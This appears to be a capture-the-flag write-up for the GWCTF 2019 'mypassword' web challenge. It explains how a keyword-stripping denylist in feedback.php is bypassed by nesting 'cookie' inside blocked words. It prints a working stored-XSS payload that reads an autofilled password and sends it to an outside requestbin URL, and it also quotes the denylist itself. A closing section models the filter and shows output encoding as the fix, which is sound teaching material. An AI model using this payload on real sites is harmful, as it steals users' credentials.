[GWCTF 2019]mypassword

Open the web page.

The following code is found in ./js/login.js:
// "Remember password" feature: if cookies are present, parse them and
// autofill the login form from the `user` and `psw` cookies.
if (document.cookie && document.cookie != '') {
    var cookies = document.cookie.split('; ');
    var cookie = {};
    for (var i = 0; i < cookies.length; i++) {
        var arr = cookies[i].split('=');
        var key = arr[0];
        cookie[key] = arr[1];
    }
    // Write the cookie values straight into the form fields
    if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
        document.getElementsByName("username")[0].value = cookie['user'];
        document.getElementsByName("password")[0].value = cookie['psw'];
    }
}

Both the username and the password are written into the form.
Register an account; admin is already taken, so use admin1.
After logging in, the following page appears.

The following code is found in feedback.php:

// Reject array input outright
if(is_array($feedback)){
    echo "<script>alert('反馈不合法');</script>";
    return false;
}
// Denylist of substrings that are stripped from the feedback
$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
foreach ($blacklist as $val) {
    // Keep removing this word (case-insensitively) until it no longer appears
    while(true){
        if(stripos($feedback,$val) !== false){
            $feedback = str_ireplace($val,"",$feedback);
        }else{
            break;
        }
    }
}


It strips a list of keywords from the feedback.

The remember-password feature in login.js reads the password back out of the cookie and writes it into the form.

Use http://http.requestbin.buuoj.cn to receive the request.

Construct the payload:

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
    var psw = docucookiement.getcookieElementsByName("password")[0].value;
    docucookiement.locacookietion="http://http.requestbin.buuoj.cn/y6b4uwy6/?a="+psw;
</scrcookieipt>
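Why the filter fails, as an added example (not the challenge's or the author's code): a JavaScript model of the feedback.php denylist loop, beside the output-encoding function that a sanitizer like this should have used instead. The sample strings are constructed for the demonstration.

```javascript
// Same denylist and order as feedback.php
const BLACKLIST = ['_', "'", '&', '\\', '#', '%', 'input', 'script', 'iframe',
  'host', 'onload', 'onerror', 'srcdoc', 'location', 'svg', 'form', 'img',
  'src', 'getElement', 'document', 'cookie'];

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Mirrors the PHP loop: for each word, str_ireplace until stripos no longer
// finds it. Words are processed in list order, so a word that only *appears*
// after a later word has been removed is never checked again.
function stripBlacklist(feedback) {
  let out = feedback;
  for (const word of BLACKLIST) {
    const re = new RegExp(escapeRegExp(word), 'gi');
    while (out.toLowerCase().includes(word.toLowerCase())) {
      out = out.replace(re, '');
    }
  }
  return out;
}

// Hardened form: do not strip anything; encode for the HTML text context so
// the browser renders the feedback as text instead of markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed samples: the denylist also mangles harmless feedback
// ('host_name' loses '_' and then 'host'), while a tag that hides a listed
// word inside another comes out intact once the inner word is removed.
const SAMPLES = {
  benign: 'please check my host_name',
  tag: '<incookieput type="text">',
};
```

Removal-based denylists are order-dependent and destroy legitimate input; encoding on output keeps the text and removes the ambiguity.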

posted @ 2021-08-29 23:12 by 凇岳